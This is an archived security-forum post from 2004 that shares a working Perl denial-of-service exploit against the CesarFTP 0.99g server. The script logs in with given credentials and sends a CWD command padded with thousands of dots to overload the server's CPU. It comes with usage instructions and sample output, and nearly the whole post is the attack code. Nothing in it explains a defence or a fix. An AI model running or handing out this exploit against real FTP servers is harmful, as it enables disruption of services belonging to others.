hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant
Help - Search - Member List - Calendar
Full Version: Perl Cesarftp 0.99g + Windowsxp Sp1
GovernmentSecurity.org > The Archives > Exploit Articles
nowhere
Mar 3 2004, 02:01 AM
QUOTE
#!/usr/bin/perl -w
use IO::Socket;

########################################
# _ _
# ____ (_) | |__
# |_ / | | | '_
# / / | | | |_) |
# /___| |_| |_.__/
#
# http://coding.romainl.com/
#
########################################
##
########################################
## tested on CesarFTP 0.99g + WindowsXP Sp1
##
## server : 127.0.0.1
## user : zib
## pass : zib
##
##$ perl expl.pl localhost zib zib
##
##server : localhost
##user : zib
##pass : zib
##
##[~] prepare to connect...
##[+] connected
##[~] prepare to send data...
##[+] success
##[~] Send CPU Overload Sequence...
##[+] CPU Overload Sequence sent
##$
########################################

if (@ARGV < 3)
{
print "############################################################# ";
print " CesarFTP 0.99g : CPU Overload ";
print " by zib http://coding.romainl.com/ ";
print " 22/12/03 ";
print "############################################################# ";
print " Usage: ";
print " cesar0.99g_dos.pl ";
print " ";
print " - host for attack ";
print " - a valid ftp user account, could be anonymous ";
print " - pass for the login ";
print "#############################################################";
exit();
}

$server = $ARGV[0];
$user = $ARGV[1];
$pass = $ARGV[2];
$nb = 10000;

print " ";
print "server : $server ";
print "user : $user ";
print "pass : $pass ";
print " ";

$i = 0;

print "[~] prepare to connect... ";

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "21") || die "[-] connect failed ";
if ($socket)
{
print "[+] connected ";
sleep(5);

print "[~] prepare to send data... ";
print $socket "USER $user ";
print "USER $user ";
sleep(1);
while (<$socket>)
{
print $_;
last;
}

print $socket "PASS $pass ";
print "PASS $pass ";
sleep(1);
while (<$socket>)
{
print $_;
last;
}

print "[+] success ";
print "[~] Send CPU Overload Sequence... ";
print $socket "CWD ";
for($i=0;$i<=$nb;$i=$i+1)
{
print $socket ".";
}
print $socket " ";
print "CWD sent ";
sleep(1);
while (<$socket>)
{
print $_;
}

print "[+] Done ";
}


This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
 
Invision Power Board © 2001-2005 Invision Power Services, Inc.